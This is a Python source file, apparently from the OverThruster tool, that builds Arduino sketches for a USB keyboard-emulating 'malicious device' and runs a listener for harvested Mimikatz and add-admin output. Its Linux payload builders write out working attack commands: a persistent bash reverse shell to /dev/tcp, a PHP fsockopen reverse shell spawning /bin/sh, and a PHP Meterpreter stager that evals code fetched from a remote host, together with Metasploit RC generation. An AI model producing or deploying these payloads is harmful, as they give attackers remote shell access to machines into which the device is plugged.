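def helperMenu():
    """Show the helper (listener) sub-menu until the operator leaves it.

    Each pass redraws the banner and the numbered entries, reads one
    selection from stdin and dispatches on it: '1' calls helperOption1(),
    '2' calls helperOption2(), '42' clears the screen and returns to the
    caller, '99' exits the interpreter. Any other input prints an error
    and the menu is drawn again.

    Written with print()/input() so it matches the Python 3 style used by
    LinuxMenu and the nix* functions in this file.
    """
    menu = {
        '1': "Invoke-Mimikatz/Add Admin/UserName and PCname Listener",
        '42': "Main Menu",
        '99': "Exit",
    }
    while True:
        HelperBanner()
        # dict.keys() has no .sort() on Python 3; sorted() gives the same
        # numeric ordering of the string keys.
        for entry in sorted(menu, key=int):
            print(entry, menu[entry])
        selection = input("\nPlease Select: ")
        if selection == '1':
            helperOption1()
        elif selection == '2':
            # NOTE(review): '2' is handled here but is not listed in the menu,
            # and helperOption2 is not defined in this part of the file - confirm.
            helperOption2()
        elif selection == '42':
            coreUtils.clearScreen()
            break
        elif selection == '99':
            exit()
        else:
            print("\n\n***That is not a valid option!***\n\n")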
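def LinuxMenu():
    """Show the Linux payload sub-menu until the operator leaves it.

    Clears the screen once, then loops: draws the banner and the numbered
    entries, reads a selection and calls the matching payload builder.
    '42' clears the screen and returns to the caller, '99' exits the
    interpreter, anything else prints an error and redraws.
    """
    coreUtils.clearScreen()
    menu = {
        '1': "Bash Reverse Shell without nc -e for Linux",
        '2': "Reverse Shell in PHP for Linux",
        '3': "meterpreter/reverse in PHP for Linux",
        '42': "Main Menu",
        '99': "Exit",
    }
    while True:
        nixBanner()
        for entry in sorted(menu, key=int):
            print(entry, menu[entry])
        selection = input("\nPlease Select: ")
        if selection == '1':
            # This file defines the option-1 builder as NixOption1 (capital N);
            # the previous call to nixOption1() did not match that definition.
            NixOption1()
        elif selection == '2':
            nixOption2()
        elif selection == '3':
            nixOption3()
        elif selection == '42':
            coreUtils.clearScreen()
            break
        elif selection == '99':
            exit()
        else:
            print("\n\n***That is not a valid option!***\n\n")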
def generalInfo():
    """Print the tool's general/requirements/about text and wait for Enter.

    Clears the screen, prints the fixed description lines one per print()
    call, then blocks on input() so the text stays visible until the
    operator acknowledges it.
    """
    coreUtils.clearScreen()
    about_lines = (
        "\n\n",
        "GENERAL",
        "OverThruster is designed to facilitate creating Arduino sketches for devices with the AtMega32U4 chipset",
        "That can do keyboard emulation. Once plugged into a system, the malicious device will type out the contents",
        "of the selected payload, which include download and execute binaries, custom powershell execution and more",
        "Options include notification bubbles from system tray to distract users as well as UAC Bypass techniques",
        "to get CMD prompts with elevated priveleges",
        "\nREQUIREMENTS",
        "This tool requires the HID-Project library for all Windows payloads",
        "Which can be installed within the Arduino IDE: Sketch->.Include Library->manage Libraries and search for \"HID-Project\"",
        "\nABOUT ME",
        "You can find me on twitter at @bhohenadel",
        "and on github at https://github.com/RedLectroid",
        "Thanks to: @loneferret and @mycurial for...alot",
        "\n",
    )
    for text in about_lines:
        print(text)
    input("Please press Enter to return to the previous screen")
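def osxWriteFile(fileName, payloadFunc, payload):
    """Assemble the OSX Arduino sketch around a payload and write it to disk.

    Args:
        fileName: target path; passed through coreUtils.checkINO() before use.
        payloadFunc: C statement(s) placed inside setup() between
            openTerminal() and closeTerminal().
        payload: C source for the payload function(s), inserted before loop().

    What the generated sketch does, as far as the emitted text shows:
    setup() presses GUI+space and types "terminal" followed by Enter, waits
    1500 ms, runs payloadFunc, then sends GUI+w and Enter. Everything is
    driven by fixed delays; the sketch never checks that a terminal
    actually opened.

    The file is opened with mode 'w'. The previous mode string 'm' is not a
    valid open() mode, so nothing was ever written.
    """
    parts = [
        "#include <Keyboard.h>\n",
        "void setup() {\n",
        " Keyboard.begin();\n",
        " openTerminal();\n",
        " delay(1500);\n",
        " " + payloadFunc,
        " closeTerminal();\n",
        " Keyboard.end();\n",
        "}\n",
        "void pressEnter(){\n",
        " Keyboard.press(KEY_RETURN);\n",
        " delay(100);\n",
        " Keyboard.release(KEY_RETURN);\n",
        "}\n",
        "void openTerminal(){\n",
        " delay(500);\n",
        " Keyboard.press(KEY_LEFT_GUI);\n",
        " Keyboard.println(\" \");\n",
        " delay(150);\n",
        " Keyboard.release(KEY_LEFT_GUI);\n",
        " delay(100);\n",
        " Keyboard.println(\"terminal\");\n",
        " delay(100);\n",
        " pressEnter();\n",
        " pressEnter();\n",
        " delay(500);\n",
        "}\n",
        "\n",
        "void closeTerminal(){\n",
        " Keyboard.press(KEY_LEFT_GUI);\n",
        " Keyboard.println(\"w\");\n",
        " delay(150);\n",
        " Keyboard.release(KEY_LEFT_GUI);\n",
        " delay(100);\n",
        " pressEnter();\n",
        "}\n",
        "\n",
        payload,
        "void loop()\n",
        "{\n",
        "}\n",
    ]
    sketch_source = "".join(parts)

    fileName = coreUtils.checkINO(fileName)
    # The context manager closes the handle even if write() raises.
    with open(fileName, 'w') as sketch:
        sketch.write(sketch_source)

    print("\n\noutput written to " + fileName)
    input("\nPress Enter to continue and return to Main Menu...")
    coreUtils.clearScreen()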
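def HelperBanner():
    """Clear the screen and print the boxed "Helper Function" banner.

    Uses single-argument print() calls, which produce the same output under
    Python 2 and Python 3, to match nixBanner in this file.
    """
    coreUtils.clearScreen()
    border = "********************************************************************************************"
    print(border)
    print("* *")
    print("* *")
    print("* Helper Function *")
    print("* These options open up various listeners for the payloads *")
    print("* *")
    print(border)
    print("\n")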
def nixBanner():
    """Clear the screen and print the boxed "Linux Payloads" banner."""
    coreUtils.clearScreen()
    border = "********************************************************************************************"
    banner_rows = (
        border,
        "* *",
        "* *",
        "* Linux Payloads *",
        "* These Payloads are made for linux, it's up to you to get a terminal open *",
        "* *",
        border,
        "\n",
    )
    for row in banner_rows:
        print(row)
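def osxBanner():
    """Clear the screen and print the boxed "OSX Payloads" banner.

    Uses single-argument print() calls, which produce the same output under
    Python 2 and Python 3, to match nixBanner in this file.
    """
    coreUtils.clearScreen()
    border = "********************************************************************************************"
    print(border)
    print("* *")
    print("* *")
    print("* OSX Payloads *")
    print("* These Payloads are for OSX *")
    print("* *")
    print(border)
    print("\n")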
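def listenerMode():
    """Let the operator pick the listener mode and return its name.

    Loops until '42' (back) or '99' (exit) is chosen. Selecting '1', '2' or
    '3' only records the mode; the menu is redrawn and the operator still
    has to choose '42' to return.

    Returns:
        "MimiKatz", "addAdmin" or "userPCname" for the last mode selected,
        or "" if the operator went back without selecting one.

    Written with print()/input() so it matches the Python 3 style used by
    LinuxMenu and the nix* functions in this file.
    """
    listener = ""
    # The entries never change, so build them once outside the loop.
    menu = {
        '1': "Set listener to Mimikatz",
        '2': "Set listener to Add Admin",
        '3': "Set listener to UserName and Computer Name",
        '42': "Back to previous menu",
        '99': "Exit",
    }
    while True:
        coreUtils.clearScreen()
        print("This menu will let you select which mode the listener will be on")
        print("This option will decide the naming convention for the ouput files")
        print("Please select 1 or 2, then select to return to the previous menu")
        print("\n")
        # dict.keys() has no .sort() on Python 3; sorted() gives the same order.
        for entry in sorted(menu, key=int):
            print(entry, menu[entry])
        print("\n\n")
        selection = input("Please select a mode: ")
        if selection == '1':
            listener = "MimiKatz"
        elif selection == '2':
            listener = "addAdmin"
        elif selection == '3':
            listener = "userPCname"
        elif selection == '42':
            coreUtils.clearScreen()
            break
        elif selection == '99':
            exit()
        else:
            print("\n\n***That is not a valid option!***\n\n")
    return listener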
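def helperOption1():
    """Configure and run the plain-TCP helper listener.

    The menu collects a listening port and a listener mode (via
    listenerMode()). Once both are set, option '3' binds a TCP socket on
    every interface, accepts connections one at a time, reads a single
    recv() of up to 4096 bytes from each and passes the peer IP, the data
    and a mode-specific suffix to printData(). The loop ends on Ctrl-C or
    when a peer connects and sends nothing.

    Exposure worth knowing when reading this code: the socket binds to ''
    (all interfaces) and nothing authenticates the sender, so any host that
    can reach the port gets its first 4096 bytes handed to printData().

    Changes from the earlier version of this function:
      * the `elif listener == 'userPCname'` branch was missing its colon,
        a syntax error that kept the whole module from loading;
      * the port is checked when it is entered instead of failing in int()
        after the menu has closed;
      * readiness is recomputed on every pass, so clearing an option after
        both were set no longer leaves the listener startable;
      * `connection` is initialised before accept(), so Ctrl-C while waiting
        no longer raises NameError in the cleanup path;
      * the listening socket is closed on the way out.
    """
    # Output-file suffix per listener mode (names as returned by listenerMode()).
    suffixes = {
        'MimiKatz': '-mimiKatz',
        'addAdmin': '-addAdmin',
        'userPCname': '-userPCname',
    }
    border = "********************************************************************************************"
    menu = {
        '1': "Set the listening port",
        '2': "Set listener to mimikatz, Admin or User and PC Name mode",
        '3': "Start the listener",
        '42': "Return to previous menu",
        '99': "Exit",
    }
    port = ""
    listener = ""

    while True:
        coreUtils.clearScreen()
        print(border)
        print("* *")
        print("* Listner *")
        print("* This helper listens on a specific port and write the relevant data to a file *")
        print("* Options are: 1.Listening Port *")
        print("* *")
        print(border)
        print("\n")
        for entry in sorted(menu, key=int):
            print(entry, menu[entry])
        print("\n\n")
        if port != "":
            print("Listening port this server set to -> " + port)
        if listener != "":
            print("Listner Mode set to " + listener + " mode")

        done = port != "" and listener in suffixes
        selection = input("\nPlease Select: ")
        if selection == '1':
            candidate = input("Please enter the listening port on this server: ").strip()
            if candidate.isdigit() and 0 < int(candidate) < 65536:
                port = candidate
            else:
                print("\nThe port must be a whole number between 1 and 65535")
                input("Press Enter to return to the menu")
        elif selection == '2':
            listener = listenerMode()
        elif selection == '3':
            if done:
                break
            print("\nYou have not set all the options")
            input("Press Enter to return to the menu and set all the options")
        elif selection == '42':
            coreUtils.clearScreen()
            return
        elif selection == '99':
            exit()
        else:
            print("\n\n***That is not a valid option!***\n\n")

    fileExtention = suffixes[listener]
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.bind(('', int(port)))
        sock.listen(1)
        while True:
            connection = None
            try:
                print("Listening for a connection...")
                connection, client_address = sock.accept()
                print('connection from', client_address[0])
                # Only this one read is processed per connection.
                data = connection.recv(4096)
                if not data:
                    print("no data from ", client_address[0])
                    break
                # NOTE(review): printData is defined elsewhere; under Python 3
                # `data` is bytes - confirm printData handles that.
                printData(client_address[0], data, fileExtention)
            except KeyboardInterrupt:
                break
            finally:
                # Clean up the connection (None when accept() never returned).
                if connection is not None:
                    connection.close()
    finally:
        sock.close()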
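def nixOption3():
    """Collect options for the PHP meterpreter/reverse_tcp sketch and write it.

    The menu gathers a remote IP, a remote port, an Arduino sketch file name
    and a Metasploit RC file name. When all four are set, option '5' builds
    a ReverseShell() sketch function, writes the sketch with nixWriteFile()
    and calls coreUtils.msfRCfile() with 'php/meterpreter/reverse_tcp'.

    What the generated sketch types, read from the string below: a single
    `php -r '...'` command that opens a TCP connection to the configured
    IP and port, reads a 4-byte length followed by that many bytes, and
    passes them to eval(). For triage that is a `php -r` process holding
    an outbound socket, entered at keyboard speed.

    Fix: options '3' and '4' were wired the wrong way round. '3' is labelled
    "Set Arduino sketch filename" but set the RC file name, and '4' the
    reverse; each handler now matches its label.

    NOTE(review): remoteIP and remotePort are concatenated as typed into a C
    string literal in the sketch, with no validation or escaping.
    """
    done = False
    looper = False
    remoteIP = ""
    remotePort = ""
    fileName = ""
    RCfile = ""
    border = "********************************************************************************************"
    menu = {
        '0': "Info",
        '1': "Set IP address of the remote server",
        '2': "Set the listening port of the remote server",
        '3': "Set Arduino sketch filename",
        '4': "Set Metasploit RC File name",
        '5': "Write Arduino sketch",
        '42': "Return to previous menu",
        '99': "Exit",
    }
    while looper != True:
        coreUtils.clearScreen()
        print(border)
        print("* *")
        print("* PHP Meterpreter Reverse TCP *")
        print("* This payload will initiate a meterpreter/reverse_tcp via PHP, requires PHP *")
        print("* Options are: 1. remote IP 2. Listening Port *")
        print("* *")
        print(border)
        print("\n")
        for entry in sorted(menu, key=int):
            print(entry, menu[entry])
        print("\n\n")
        if remoteIP != "":
            print("IP of the remote server set to -> " + remoteIP)
        if remotePort != "":
            print("Listening port on the remote server set to -> " + remotePort)
        if RCfile != "":
            print("Metasploit RC File name set to -> " + RCfile)
        if fileName != "":
            print("Arduino filename set to -> " + fileName)
        selection = input("\nPlease Select: ")
        if selection == '1':
            remoteIP = input("Please enter the IP address of the remote server to connect to: ")
        elif selection == '2':
            remotePort = input("Please enter the listening port on the remote server:")
        elif selection == '3':
            # Matches the menu label: the Arduino sketch file name.
            fileName = coreUtils.getFileName('reverseMetPHP.ino')
        elif selection == '4':
            # Matches the menu label: the Metasploit RC file name.
            RCfile = coreUtils.getRCFileName('reverseMetPHP.rc')
        elif selection == '5':
            if done == False:
                print("\nYou have not set all the options")
                input("Press Enter to return to the menu and set all the options")
            else:
                looper = True
        elif selection == '42':
            coreUtils.clearScreen()
            break
        elif selection == '99':
            exit()
        elif selection == '0':
            nfoCore.nix3info()
        else:
            print("\n\n***That is not a valid option!***\n\n")
        if remoteIP != "" and remotePort != "" and fileName != "" and RCfile != "":
            done = True

    # looper is only True after option '5' with every value set; '42' leaves
    # the loop with looper False and nothing is written.
    if done == True and looper == True:
        payload = "void ReverseShell(){\n"
        payload += "Keyboard.println(\"php -r 'error_reporting(0); $ip = \\\""+remoteIP+"\\\"; $port = "+remotePort+"; if (($f = \\\"stream_socket_client\\\") && is_callable($f)) { $s = $f(\\\"tcp://{$ip}:{$port}\\\");"
        payload += " $s_type = \\\"stream\\\"; } elseif (($f = \\\"fsockopen\\\") && is_callable($f)) { $s = $f($ip, $port); $s_type = \\\"stream\\\"; } elseif (($f = \\\"socket_create\\\") && is_callable($f))"
        payload += " { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = \\\"socket\\\"; } else { die(\\\"no socket funcs\\\"); } if (!$s) { die(\\\"no socket\\\");"
        payload += " } switch ($s_type) { case \\\"stream\\\": $len = fread($s, 4); break; case \\\"socket\\\": $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(\\\"Nlen\\\", $len); $len = $a[\\\"len\\\"];"
        payload += " $b = \\\"\\\"; while (strlen($b) < $len) { switch ($s_type) { case \\\"stream\\\": $b .= fread($s, $len-strlen($b)); break; case \\\"socket\\\": $b .= socket_read($s, $len-strlen($b)); break;"
        payload += " } } $GLOBALS[\\\"msgsock\\\"] = $s; $GLOBALS[\\\"msgsock_type\\\"] = $s_type; eval($b); die();'\");\n"
        payload += " pressEnter();\n"
        payload += "}\n"
        payloadFunc = "ReverseShell();\n"
        nixWriteFile(fileName, payloadFunc, payload)
        coreUtils.msfRCfile(remoteIP, remotePort, 'php/meterpreter/reverse_tcp', RCfile)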
def nixOption2():
    """Collect options for the PHP reverse-shell sketch and write it.

    The menu gathers a remote IP, a remote port and an Arduino sketch file
    name. Once all three have been set, option '4' builds a ReverseShell()
    sketch function and hands it to nixWriteFile(). '42' returns without
    writing anything; '99' exits the interpreter.

    What the generated sketch types, read from the string below: a one-line
    `php -r` command that calls fsockopen() on the configured IP and port
    and then exec()s `/bin/sh -i` with its standard streams redirected to
    descriptor 3.
    """
    border = "********************************************************************************************"
    header = (
        border,
        "* *",
        "* PHP Reverse Shell *",
        "* This payload will initiate a reverse shell via PHP, requires PHP *",
        "* Options are: 1. remote IP 2. Listening Port *",
        "* *",
        border,
        "\n",
    )
    # Already in the numeric order the menu is displayed in.
    entries = (
        ('0', "Info"),
        ('1', "Set IP address of the remote server"),
        ('2', "Set the listening port of the remote server"),
        ('3', "Set Arduino sketch filename"),
        ('4', "Write Arduino sketch"),
        ('42', "Return to previous menu"),
        ('99', "Exit"),
    )
    host = ""
    port = ""
    sketch_name = ""
    ready = False  # latches to True once all three values have been set

    while True:
        coreUtils.clearScreen()
        for row in header:
            print(row)
        for key, label in entries:
            print(key, label)
        print("\n\n")
        if host != "":
            print("IP of the remote server set to -> " + host)
        if port != "":
            print("Listening port on the remote server set to -> " + port)
        if sketch_name != "":
            print("Arduino filename set to -> " + sketch_name)

        choice = input("\nPlease Select: ")
        if choice == '0':
            nfoCore.nix2info()
        elif choice == '1':
            host = input("Please enter the IP address of the remote server to connect to: ")
        elif choice == '2':
            port = input("Please enter the listening port on the remote server:")
        elif choice == '3':
            sketch_name = coreUtils.getFileName('revShellPHP.ino')
        elif choice == '4':
            if ready:
                break
            print("\nYou have not set all the options")
            input("Press Enter to return to the menu and set all the options")
        elif choice == '42':
            coreUtils.clearScreen()
            return
        elif choice == '99':
            exit()
        else:
            print("\n\n***That is not a valid option!***\n\n")

        if host != "" and port != "" and sketch_name != "":
            ready = True

    # Only reached through option '4' with every value set.
    payload = "".join([
        "void ReverseShell(){\n",
        "Keyboard.println(\"php -r '$sock=fsockopen(\\\"" + host + "\\\"," + port + ");exec(\\\"/bin/sh -i <&3 >&3 2>&3\\\");'\");\n",
        " pressEnter();\n",
        "}\n",
    ])
    payloadFunc = "ReverseShell();\n"
    nixWriteFile(sketch_name, payloadFunc, payload)
def NixOption1():
    """Collect options for the bash reverse-shell sketch and write it.

    The menu gathers a remote IP, a remote port and an Arduino sketch file
    name. Once all three have been set, option '4' builds a ReverseShell()
    sketch function and hands it to nixWriteFile(). '42' returns without
    writing anything; '99' exits the interpreter.

    What the generated sketch types, read from the string below: a
    `nohup bash -c "while true; ..."` command, backgrounded with stdout sent
    to /dev/null, whose loop runs `bash -i` redirected to
    /dev/tcp/<ip>/<port> and sleeps one second between attempts. On a host
    that shows up as a long-lived `bash -c` loop that survives the terminal
    closing.
    """
    border = "********************************************************************************************"
    header = (
        border,
        "* *",
        "* Bash Reverse Shell without NetCat *",
        "* This payload will initiate a Bash reverse shell without Netcat *",
        "* Options are: 1. remote IP 2. Listening Port *",
        "* *",
        border,
        "\n",
    )
    # Already in the numeric order the menu is displayed in.
    entries = (
        ('0', "Info"),
        ('1', "Set IP address of the remote server"),
        ('2', "Set the listening port of the remote server"),
        ('3', "Set Arduino sketch filename"),
        ('4', "Write Arduino sketch"),
        ('42', "Return to previous menu"),
        ('99', "Exit"),
    )
    host = ""
    port = ""
    sketch_name = ""
    ready = False  # latches to True once all three values have been set

    while True:
        coreUtils.clearScreen()
        for row in header:
            print(row)
        for key, label in entries:
            print(key, label)
        print("\n\n")
        if host != "":
            print("IP of the remote server set to -> " + host)
        if port != "":
            print("Listening port on the remote server set to -> " + port)
        if sketch_name != "":
            print("Arduino filename set to -> " + sketch_name)

        choice = input("\nPlease Select: ")
        if choice == '0':
            nfoCore.nix1info()
        elif choice == '1':
            host = input("Please enter the IP address of the remote server to connect to: ")
        elif choice == '2':
            port = input("Please enter the listening port on the remote server:")
        elif choice == '3':
            sketch_name = coreUtils.getFileName('reverseCMD.ino')
        elif choice == '4':
            if ready:
                break
            print("\nYou have not set all the options")
            input("Press Enter to return to the menu and set all the options")
        elif choice == '42':
            coreUtils.clearScreen()
            return
        elif choice == '99':
            exit()
        else:
            print("\n\n***That is not a valid option!***\n\n")

        if host != "" and port != "" and sketch_name != "":
            ready = True

    # Only reached through option '4' with every value set.
    payload = "".join([
        "void ReverseShell(){\n",
        "Keyboard.println(\"nohup bash -c \\\"while true;do bash -i >& /dev/tcp/" + host + "/" + port + " 0>&1 2>&1; sleep 1;done\\\" 1>/dev/null &\");\n",
        " pressEnter();\n",
        "}\n",
    ])
    payloadFunc = "ReverseShell();\n"
    nixWriteFile(sketch_name, payloadFunc, payload)